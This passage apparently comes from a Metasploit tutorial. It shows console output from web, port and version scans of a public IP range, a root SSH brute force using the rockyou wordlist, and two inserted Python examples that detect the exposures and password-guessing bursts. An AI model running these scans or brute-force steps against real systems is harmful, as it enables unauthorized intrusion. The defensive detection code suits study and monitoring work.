  1686. [*]
  1687. =[ SSL testing ]=
  1688. ============================================================
  1689. [*] Target is not SSL. SSL modules disabled.
  1690. [*]
  1691. =[ Web Server testing ]=
  1692. ============================================================
  1693. [*] Module auxiliary/scanner/http/http_version
  1694.  
  1695. [*] 198.71.232.3:80 DPS/1.0.3
  1696. [*] Module auxiliary/scanner/http/open_proxy
  1697. [*] Module auxiliary/scanner/http/robots_txt
  1698. [*] Module auxiliary/scanner/http/frontpage_login
  1699. [*] http://198.71.232.3/ may not support FrontPage Server Extensions
  1700. [*] Module auxiliary/scanner/http/host_header_injection
  1701. [*] Module auxiliary/admin/http/tomcat_administration
  1702. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  1703. [*] Attempting to connect to 198.71.232.3:80
  1704. [+] No File(s) found
  1705. [*] Module auxiliary/scanner/http/options
  1706. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  1707. [-] 198.71.232.3 does not appear to be vulnerable, will not continue
  1708. [*] Module auxiliary/scanner/http/scraper
  1709. [*] [198.71.232.3] / [404 Not Found]
  1710. [*] Module auxiliary/scanner/http/svn_scanner
  1711. [*] Using code '404' as not found.
  1712. [*] Module auxiliary/scanner/http/trace
  1713. [*] Module auxiliary/scanner/http/vhost_scanner
  1714. [*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
  1715. [*] Module auxiliary/scanner/http/webdav_internal_ip
  1716. [*] Module auxiliary/scanner/http/webdav_scanner
  1717. [*] Module auxiliary/scanner/http/webdav_website_content
  1718. [*]
  1719. =[ File/Dir testing ]=
  1720. ============================================================
  1721. [*] Module auxiliary/dos/http/apache_range_dos
  1722. [*] Module auxiliary/scanner/http/backup_file
  1723. [*] Module auxiliary/scanner/http/brute_dirs
  1724. [*] Path: /
  1725. [*] Using code '404' as not found.
  1726. [*] Module auxiliary/scanner/http/copy_of_file
  1727. [*] Module auxiliary/scanner/http/dir_listing
  1728. [*] Path: /
  1729. [*] Module auxiliary/scanner/http/dir_scanner
  1730. [*] Path: /
  1731. [*] Detecting error code
  1732. [*] Using code '404' as not found for 198.71.232.3
  1733. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  1734. [*] Path: /
  1735. [*] Using code '404' as not found.
  1736. [*] Module auxiliary/scanner/http/file_same_name_dir
  1737. [*] Path: /
  1738. [-] Blank or default PATH set.
  1739. [*] Module auxiliary/scanner/http/files_dir
  1740. [*] Path: /
  1741. [*] Using code '404' as not found for files with extension .null
  1742. [*] Module auxiliary/scanner/http/http_put
  1743. [*] Path: /
  1744. [-] File doesn't seem to exist. The upload probably failed.
  1745. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  1746. [*] Path: /
  1747. [-] 198.71.232.3:80 Folder does not require authentication. [404]
  1748. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  1749. [*] Path: /
  1750. [-] Blank or default PATH set.
  1751. [*] Module auxiliary/scanner/http/replace_ext
  1752. [*] Module auxiliary/scanner/http/soap_xml
  1753. [*] Path: /
  1754. [*] Starting scan with 0ms delay between requests
  1755. [-] The connection timed out (198.71.232.3:80).
  1756. [-] The connection timed out (198.71.232.3:80).
  1757. [*] Module auxiliary/scanner/http/trace_axd
  1758. [*] Path: /
  1759. [*] Module auxiliary/scanner/http/verb_auth_bypass
  1760. [*]
  1761. =[ Unique Query testing ]=
  1762. ============================================================
  1763. [*] Module auxiliary/scanner/http/blind_sql_query
  1764. [*] Module auxiliary/scanner/http/error_sql_injection
  1765. [*] Module auxiliary/scanner/http/http_traversal
  1766. [*] Module auxiliary/scanner/http/rails_mass_assignment
  1767. [*] Module exploit/multi/http/lcms_php_exec
  1768. [*]
  1769. =[ Query testing ]=
  1770. ============================================================
  1771. [*]
  1772. =[ General testing ]=
  1773. ============================================================
  1774. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  1775. Launch completed in 8302.240582227707 seconds.
  1776. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  1777. [*] Done.
  1778.  
  1779. Once the scan has finished executing, we take a look at the database to see if WMAP found anything of interest.
  1780.  
  1781.  
  1782. CHECK THE VULNERABILITIES
  1783.  
  1784. msf > wmap_vulns -l
  1785. [*] + [198.71.232.3] (198.71.232.3): scraper /
  1786. [*] scraper Scraper
  1787. [*] GET 404 Not Found
  1788.  
  1789.  
  1790. LIST THE VULNERABILITIES STORED IN THE DB
  1791.  
  1792. msf > vulns
  1793.  
  1794.  
  1795. RUN DB_NMAP
  1796.  
  1797. msf > db_nmap 198.71.232.3 -PN
  1798. [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 17:31 CEST
  1799. [*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
  1800. [*] Nmap: Nmap scan report for 198.71.232.3
  1801. [*] Nmap: Host is up (0.11s latency).
  1802. [*] Nmap: Not shown: 998 filtered ports
  1803. [*] Nmap: PORT STATE SERVICE
  1804. [*] Nmap: 80/tcp open http
  1805. [*] Nmap: 443/tcp open https
  1806. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds
  1807.  
  1808. EXPORT NMAP RESULTS
  1809.  
  1810. msf > db_export -f xml /root/Desktop/Exported.xml
  1811. [*] Starting export of workspace default to /root/Desktop/Exported.xml [ xml ]...
  1812. [*] >> Starting export of report
  1813. [*] >> Starting export of hosts
  1814. [*] >> Starting export of events
  1815. [*] >> Starting export of services
  1816. [*] >> Starting export of web sites
  1817. [*] >> Starting export of web pages
  1818. [*] >> Starting export of web forms
  1819. [*] >> Starting export of web vulns
  1820. [*] >> Starting export of module details
  1821. [*] >> Finished export of report
  1822. [*] Finished export of workspace default to /root/Desktop/Exported.xml [ xml ]...
  1823.  
  1824.  
  1825. IMPORT THE EXPORTED WORKSPACE (HOSTS, SERVICES AND NMAP RESULTS)
  1826.  
  1829. msf > db_import /root/Desktop/Exported.xml
  1830. [*] Importing 'Metasploit XML' data
  1831. [*] Importing host 198.71.232.0
  1832. [*] Importing host 198.71.232.1
  1833. [*] Importing host 198.71.232.2
  1834. [*] Importing host 198.71.232.3
  1835. [*] Importing host 198.71.232.4
  1836. [*] Importing host 198.71.232.5
  1837. [*] Importing host 198.71.232.6
  1838. [*] Importing host 198.71.232.7
  1839. [*] Importing host 198.71.232.9
  1840. [*] Successfully imported /root/Desktop/Exported.xml
  1841.  
  1842.  
  1843.  
  1844. msf > hosts
  1845.  
  1846. Hosts
  1847. =====
  1848.  
  1849. address mac name os_name os_flavor os_sp purpose info comments
  1850. ------- --- ---- ------- --------- ----- ------- ---- --------
  1851. 198.71.232.0 Unknown device
  1852. 198.71.232.1 Unknown device
  1853. 198.71.232.2 Unknown device
  1854. 198.71.232.3 198.71.232.3 Unknown device
  1855. 198.71.232.4 Unknown device
  1856. 198.71.232.5 Unknown device
  1857. 198.71.232.6 Unknown device
  1858. 198.71.232.7 Unknown device
  1859. 198.71.232.9 Unknown device
  1860.  
  1861.  
  1862.  
  1863. msf > hosts -c address,os_flavor
  1864.  
  1865. Hosts
  1866. =====
  1867.  
  1868. address os_flavor
  1869. ------- ---------
  1870. 198.71.232.0
  1871. 198.71.232.1
  1872. 198.71.232.2
  1873. 198.71.232.3
  1874. 198.71.232.4
  1875. 198.71.232.5
  1876. 198.71.232.6
  1877. 198.71.232.7
  1878. 198.71.232.9
  1879.  
  1880.  
  1881.  
  1882. msf > hosts -c address,os_flavor -S Linux
  1883.  
  1884. msf auxiliary(tcp) > show options
  1885.  
  1886. msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R
  1887.  
  1888. RHOSTS => 198.71.232.3
  1889.  
  1890. msf auxiliary(tcp) > run
  1891.  
  1892. msf auxiliary(tcp) > hosts -R
  1893.  
  1894. RHOSTS => 198.71.232.3
  1895.  
  1896. msf auxiliary(tcp) > show options
  1897.  
  1898. msf > services -c name,info 198.71.232.3
  1899.  
  1900. Services
  1901. ========
  1902.  
  1903. host name info
  1904. ---- ---- ----
  1905. 198.71.232.3 http DPS/1.0.3
  1906. 198.71.232.3 https
  1907.  
  1908.  
  1909. msf > services -c name,info -S http
  1910.  
  1911. Services
  1912. ========
  1913.  
  1914. host name info
  1915. ---- ---- ----
  1916. 198.71.232.3 http DPS/1.0.3
  1917. 198.71.232.3 https
  1918. 198.71.232.4 https
  1919. 198.71.232.4 http
  1920. 198.71.232.5 https
  1921. 198.71.232.6 http
  1922. 198.71.232.6 https
  1923. 198.71.232.7 http
  1924. 198.71.232.7 https
  1925. 198.71.232.9 http
  1926.  
  1927. msf > services -c name,info -S https
  1928.  
  1929. Services
  1930. ========
  1931.  
  1932. host name info
  1933. ---- ---- ----
  1934. 198.71.232.3 https
  1935. 198.71.232.4 https
  1936. 198.71.232.5 https
  1937. 198.71.232.6 https
  1938. 198.71.232.7 https
  1939.  
  1940.  
  1941. msf > services -c info,name -p 443
  1942.  
  1943. Services
  1944. ========
  1945.  
  1946. host info name
  1947. ---- ---- ----
  1948. 198.71.232.3 https
  1949. 198.71.232.4 https
  1950. 198.71.232.5 https
  1951. 198.71.232.6 https
  1952. 198.71.232.7 https
  1953.  
  1954.  
  1957. msf > services -c port,proto,state -p 70-81
  1958.  
  1959. Services
  1960. ========
  1961.  
  1962. host port proto state
  1963. ---- ---- ----- -----
  1964. 198.71.232.3 80 tcp open
  1965. 198.71.232.4 80 tcp open
  1966. 198.71.232.6 80 tcp open
  1967. 198.71.232.7 80 tcp open
  1968. 198.71.232.9 80 tcp open
  1969.  
  1970. msf > services -c port,proto,state -p 70-81-3306
  1971.  
  1972. Services
  1973. ========
  1974.  
  1975. host port proto state
  1976. ---- ---- ----- -----
  1977. 198.71.232.3 80 tcp open
  1978. 198.71.232.4 80 tcp open
  1979. 198.71.232.6 80 tcp open
  1980. 198.71.232.7 80 tcp open
  1981. 198.71.232.9 80 tcp open
  1982.  
  1983.  
  1984. msf > services -c port,proto,state -p 21-22-25-70-80-81-443-3306
  1985.  
  1986. Services
  1987. ========
  1988.  
  1989. host port proto state
  1990. ---- ---- ----- -----
  1991. 198.71.232.7 22 tcp open
  1992.  
  1993.  
  1994. msf > services -s http -c port 198.71.232.3
  1995.  
  1996. Services
  1997. ========
  1998.  
  1999. host port
  2000. ---- ----
  2001. 198.71.232.3 80
  2002.  
  2003. msf > services -s https -c port 198.71.232.3
  2004.  
  2005. Services
  2006. ========
  2007.  
  2008. host port
  2009. ---- ----
  2010. 198.71.232.3 443
  2011.  
  2012.  
  2013. msf > services -S Unr
  2014.  
  2015. Services
  2016. ========
  2017.  
  2018. host port proto name state info
  2019. ---- ---- ----- ---- ----- ----
  2020.  
  2021.  
  2022. CSV EXPORT
  2023.  
  2024. msf > services -s http -c port 198.71.232.3 -o /root/Desktop/http.csv
  2025.  
  2026. [*] Wrote services to /root/Desktop/http.csv
  2027.  
  2028. msf > services -s https -c port 198.71.232.3 -o /root/Desktop/https.csv
  2029.  
  2030. [*] Wrote services to /root/Desktop/https.csv
  2031.  
  2032. msf > hosts -S Linux -o /root/Desktop/linux.csv
  2033. [*] Wrote hosts to /root/Desktop/linux.csv
  2034.  
  2035. msf > cat /root/Desktop/http.csv
  2036. [*] exec: cat /root/Desktop/http.csv
  2037.  
  2038. host,port
  2039. "198.71.232.3","80"
  2040.  
  2041. msf > cat /root/Desktop/https.csv
  2042. [*] exec: cat /root/Desktop/https.csv
  2043.  
  2044. host,port
  2045. "198.71.232.3","443"
  2046.  
  2047. msf > cat /root/Desktop/linux.csv
  2048. [*] exec: cat /root/Desktop/linux.csv
  2049.  
  2050. address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
  2051.  
  2052. RELOAD ALL METASPLOIT MODULES
  2053.  
  2054. msf > reload_all
  2055. [*] Reloading modules from all module paths...
  2056.  
  2057. ______________________________________________________________________________
  2058. | |
  2059. | METASPLOIT CYBER MISSILE COMMAND V4 |
  2060. |______________________________________________________________________________|
  2061. \ / /
  2062. \ . / / x
  2063. \ / /
  2064. \ / + /
  2065. \ + / /
  2066. * / /
  2067. / . /
  2068. X / / X
  2069. / ###
  2070. / # % #
  2071. / ###
  2072. . /
  2073. . / . * .
  2074. /
  2075. *
  2076. + *
  2077.  
  2078. ^
  2079. #### __ __ __ ####### __ __ __ ####
  2080. #### / \ / \ / \ ########### / \ / \ / \ ####
  2081. ################################################################################
  2082. ################################################################################
  2083. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  2084. ################################################################################
  2085. http://metasploit.pro
  2086.  
  2087.  
  2088. Easy phishing: Set up email templates, landing pages and listeners
  2089. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
  2090.  
  2091. =[ metasploit v4.11.5-2016010401 ]
  2092. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
  2093. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
  2094. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2095.  
  2096.  
  2097. USE ARP_SWEEP (ARP only reaches hosts on the local link, so sweeping a remote range like this finds nothing)
  2098.  
  2099. msf > use auxiliary/scanner/discovery/arp_sweep
  2100. msf auxiliary(arp_sweep) > show options
  2101.  
  2102. Module options (auxiliary/scanner/discovery/arp_sweep):
  2103.  
  2104. Name Current Setting Required Description
  2105. ---- --------------- -------- -----------
  2106. INTERFACE no The name of the interface
  2107. RHOSTS yes The target address range or CIDR identifier
  2108. SHOST no Source IP Address
  2109. SMAC no Source MAC Address
  2110. THREADS 1 yes The number of concurrent threads
  2111. TIMEOUT 5 yes The number of seconds to wait for new data
  2112.  
  2113. msf auxiliary(arp_sweep) > set RHOSTS 198.71.232.3/24
  2114. RHOSTS => 198.71.232.3/24
  2115. msf auxiliary(arp_sweep) > set THREADS 50
  2116. THREADS => 50
  2117. msf auxiliary(arp_sweep) > run
  2118.  
  2119. [*] Scanned 256 of 256 hosts (100% complete)
  2120. [*] Auxiliary module execution completed
  2121.  
  2122.  
  2123. msf auxiliary(arp_sweep) > back
  2124.  
  2125. USE NMAP
  2126.  
  2127. msf > nmap -sn 198.71.232.3/24
  2128. [*] exec: nmap -sn 198.71.232.3/24
  2129.  
  2130.  
  2131. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:31 CEST
  2132. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2133. Nmap scan report for 198.71.232.0
  2134. Host is up (0.11s latency).
  2135. Nmap scan report for 198.71.232.1
  2136. Host is up (0.11s latency).
  2137. Nmap scan report for 198.71.232.2
  2138. Host is up (0.11s latency).
  2139. Nmap scan report for 198.71.232.3
  2140. Host is up (0.11s latency).
  2141. Nmap scan report for 198.71.232.4
  2142. Host is up (0.11s latency).
  2143. Nmap scan report for 198.71.232.5
  2144. Host is up (0.11s latency).
  2145. Nmap scan report for 198.71.232.6
  2146. Host is up (0.11s latency).
  2147. Nmap scan report for 198.71.232.7
  2148. Host is up (0.11s latency).
  2149. Nmap scan report for 198.71.232.8
  2150. Host is up (0.11s latency).
  2151. Nmap scan report for 198.71.232.9
  2152. Host is up (0.11s latency).
  2153. Nmap done: 256 IP addresses (10 hosts up) scanned in 5.25 seconds
  2154.  
  2155.  
  2156. msf > nmap -PU -sn 198.71.232.3/24
  2157. [*] exec: nmap -PU -sn 198.71.232.3/24
  2158.  
  2159.  
  2160. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:33 CEST
  2161. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2162. Nmap done: 256 IP addresses (0 hosts up) scanned in 52.11 seconds
  2163.  
  2164.  
  2165. msf > nmap -O 198.71.232.3
  2166. [*] exec: nmap -O 198.71.232.3
  2167.  
  2168.  
  2169. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:34 CEST
  2170. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2171. Nmap scan report for 198.71.232.3
  2172. Host is up (0.11s latency).
  2173. Not shown: 998 filtered ports
  2174. PORT STATE SERVICE
  2175. 80/tcp open http
  2176. 443/tcp open https
  2177. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2178. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds


SEARCH PORTSCAN

msf > search portscan

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner

USE PORTSCAN

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(syn) > set THREADS 200
THREADS => 200
msf auxiliary(syn) > run

[*] TCP OPEN 198.71.232.3:80
[*] TCP OPEN 198.71.232.3:443

SEARCH NAME_VERSION

msf > search name:_version

USE TELNET AUXILIARY SCANNER

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3
msf auxiliary(telnet_version) > set THREADS 100
THREADS => 100
msf auxiliary(telnet_version) > run

[*] Scanned 41 of 256 hosts (16% complete)
[*] Scanned 93 of 256 hosts (36% complete)
[*] Scanned 96 of 256 hosts (37% complete)
[*] Scanned 130 of 256 hosts (50% complete)
[*] Scanned 131 of 256 hosts (51% complete)
[*] Scanned 192 of 256 hosts (75% complete)
[*] Scanned 193 of 256 hosts (75% complete)
[*] Scanned 211 of 256 hosts (82% complete)
[*] Scanned 241 of 256 hosts (94% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >


USE AUXILIARY SSH_VERSION

msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe

msf auxiliary(ssh_version) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3/24
msf auxiliary(ssh_version) > set THREADS 200
THREADS => 200
msf auxiliary(ssh_version) > run

[*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )
[*] Scanned 42 of 256 hosts (16% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 119 of 256 hosts (46% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 137 of 256 hosts (53% complete)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 255 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
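The SYN scan above reports two listeners on the target, and the ssh_version sweep of the surrounding /24 reports an OpenSSH banner on a neighbouring host. The defender's use of exactly this output is an exposure inventory: parse the scanner lines into structured records and compare each host against what it is supposed to expose, so an unapproved listener (here the SSH service on 198.71.232.7) stands out. The Python below is an added example, not part of the original paste or of Metasploit; the two line formats it parses are copied from the output above, while the allow-list (the web host may expose only 80 and 443) and the sample lines fed to it are constructed.

```python
"""Turn Metasploit auxiliary-scanner console output into an exposure inventory.

Added example (not from the original paste). The line formats below are the
ones printed by portscan/syn and ssh_version on this page; the allow-list is a
constructed policy for a hypothetical web host that should expose only 80/443.
"""
import re
from dataclasses import dataclass, field

# portscan/syn:   [*] TCP OPEN 198.71.232.3:80
OPEN_PORT_RE = re.compile(r"^\[\*\] TCP OPEN (?P<host>[\d.]+):(?P<port>\d+)$")
# ssh_version:    [*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 ... )
BANNER_RE = re.compile(
    r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) (?P<service>\w+) server version: (?P<banner>\S+)"
    r"(?: \((?P<attrs>.*)\))?"
)
ATTR_RE = re.compile(r"(\S+)=(\S+)")


@dataclass
class Exposure:
    host: str
    port: int
    service: str = "unknown"
    banner: str = ""
    attrs: dict = field(default_factory=dict)


def parse_scanner_output(lines):
    """Return {(host, port): Exposure} built from msfconsole scanner lines.

    Progress lines, prompts and blanks are ignored rather than raising, since
    console output is noisy and the two formats above are all we need.
    """
    found = {}
    for raw in lines:
        line = raw.strip()
        m = OPEN_PORT_RE.match(line)
        if m:
            key = (m["host"], int(m["port"]))
            found.setdefault(key, Exposure(*key))
            continue
        m = BANNER_RE.match(line)
        if m:
            key = (m["host"], int(m["port"]))
            exp = found.setdefault(key, Exposure(*key))
            exp.service = m["service"]
            exp.banner = m["banner"]
            if m["attrs"]:
                exp.attrs = dict(ATTR_RE.findall(m["attrs"]))
    return found


def policy_violations(found, allowed):
    """Return the exposures not covered by the per-host allow-list.

    `allowed` maps host -> set of approved ports; a host missing from the map
    approves nothing, so a stray listener on a neighbour in the /24 is reported.
    """
    return [exp for (host, port), exp in sorted(found.items())
            if port not in allowed.get(host, set())]


# Constructed sample: the result lines from the scans above plus typical noise.
SAMPLE_OUTPUT = """
[*] TCP OPEN 198.71.232.3:80
[*] TCP OPEN 198.71.232.3:443
[*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )
[*] Scanned 42 of 256 hosts (16% complete)
[*] Auxiliary module execution completed
""".strip().splitlines()

# Constructed policy: the web host may expose 80 and 443, nothing else is approved.
ALLOWED = {"198.71.232.3": {80, 443}}

if __name__ == "__main__":
    inventory = parse_scanner_output(SAMPLE_OUTPUT)
    for exp in policy_violations(inventory, ALLOWED):
        print(f"unapproved listener {exp.host}:{exp.port} {exp.service} {exp.banner}")
```

Feeding the real console log to `parse_scanner_output` and diffing the result against the previous run turns a one-off scan into change detection: a new (host, port) pair or a changed banner is what should page someone.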


USE ORACLE SCANNER

msf auxiliary(tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

msf auxiliary(tnslsnr_version) > set RHOSTS 198.71.232.3/24
RHOSTS => 198.71.232.3/24
msf auxiliary(tnslsnr_version) > set THREADS 200
THREADS => 200
msf auxiliary(tnslsnr_version) > run

[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 113 of 256 hosts (44% complete)
[*] Scanned 131 of 256 hosts (51% complete)
[*] Scanned 188 of 256 hosts (73% complete)
[*] Scanned 200 of 256 hosts (78% complete)
[*] Scanned 237 of 256 hosts (92% complete)
[*] Scanned 243 of 256 hosts (94% complete)
[*] Scanned 250 of 256 hosts (97% complete)
[*] Scanned 252 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


USE OPEN_PROXY

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy

msf auxiliary(open_proxy) > show options

Module options (auxiliary/scanner/http/open_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
MULTIPORTS false no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
RANDOMIZE_PORTS false no Randomize the order the ports are probed
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
THREADS 1 yes The number of concurrent threads
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
VERIFY_CONNECT false no Enable test for CONNECT method
VERIFY_HEAD false no Enable test for HEAD method
ValidCode 200,302 no Valid HTTP code for a successfully request
ValidPattern server: gws no Valid HTTP server header for a successfully request

msf auxiliary(open_proxy) > set LOOKUP_PUBLIC_ADDRESS true
LOOKUP_PUBLIC_ADDRESS => true
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > show options

Module options (auxiliary/scanner/http/open_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
LOOKUP_PUBLIC_ADDRESS true no Enable test for retrieve public IP address via RIPE.net
MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
RANDOMIZE_PORTS false no Randomize the order the ports are probed
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
THREADS 1 yes The number of concurrent threads
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
VERIFY_CONNECT false no Enable test for CONNECT method
VERIFY_HEAD false no Enable test for HEAD method
ValidCode 200,302 no Valid HTTP code for a successfully request
ValidPattern server: gws no Valid HTTP server header for a successfully request

msf auxiliary(open_proxy) > set RANDOMIZE_PORTS true
RANDOMIZE_PORTS => true
msf auxiliary(open_proxy) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(open_proxy) > set RPORT 8080
RPORT => 8080
msf auxiliary(open_proxy) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_proxy) >


USE SSH_LOGIN

msf auxiliary(open_proxy) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/rockyou.txt
PASS_FILE => /root/Desktop/rockyou.txt
msf auxiliary(ssh_login) > set THREADS 2000
THREADS => 2000
msf auxiliary(ssh_login) > run

[*] 198.71.232.3:22 SSH - Starting bruteforce
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
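The ssh_login run above is a wordlist password-guessing attempt against root, and it fails only because port 22 does not answer on this host. On a host where sshd does answer, the same activity shows up in the auth log as a burst of "Failed password" lines from one source, and that burst is what a detection should key on rather than any single failure. The Python below is an added example, not part of the original paste: it parses OpenSSH auth-log lines and flags any source that exceeds a threshold of failures inside a sliding window. The log lines are constructed (RFC 5737 documentation addresses, hostname web01) in the standard OpenSSH syslog format; the threshold and window are illustrative policy values, not settings from the page.

```python
"""Flag SSH password-guessing bursts in an OpenSSH auth log.

Added example, not from the original paste. The log lines below are constructed
(RFC 5737 documentation addresses, hostname web01) in the standard OpenSSH
syslog format:
  <Mon DD HH:MM:SS> <host> sshd[<pid>]: Failed password for [invalid user] <user> from <ip> port <n> ssh2
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_failed_logins(lines, year=2016):
    """Yield (timestamp, source_ip, username) for each failed-password line.

    Accepted logins, disconnects and other noise are skipped. Syslog
    timestamps carry no year, so the caller supplies it.
    """
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["ip"], m["user"]


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2016):
    """Return {source_ip: (count, first_ts, last_ts, usernames)} for every
    source with at least `threshold` failures inside a sliding window.

    A deque per source holds only the failures still inside the window, so a
    slow trickle of genuine typos ages out while a burst trips the detector.
    Lines are assumed to arrive in log order.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    users = defaultdict(set)
    alerts = {}
    for ts, ip, user in parse_failed_logins(lines, year):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while ts - q[0] > window:      # q always holds ts itself, so it never empties
            q.popleft()
        if len(q) >= threshold:
            # keep the latest picture of the burst: size, span, usernames tried
            alerts[ip] = (len(q), q[0], ts, sorted(users[ip]))
    return alerts


# Constructed sample log: one burst from 203.0.113.5 against root/admin, and two
# widely spaced failures from a legitimate operator at 198.51.100.7.
SAMPLE_AUTH_LOG = """
May 29 19:58:01 web01 sshd[2101]: Accepted publickey for deploy from 198.51.100.7 port 40122 ssh2
May 29 19:58:40 web01 sshd[2140]: Failed password for root from 203.0.113.5 port 51001 ssh2
May 29 19:58:41 web01 sshd[2141]: Failed password for root from 203.0.113.5 port 51002 ssh2
May 29 19:58:41 web01 sshd[2142]: Failed password for invalid user admin from 203.0.113.5 port 51003 ssh2
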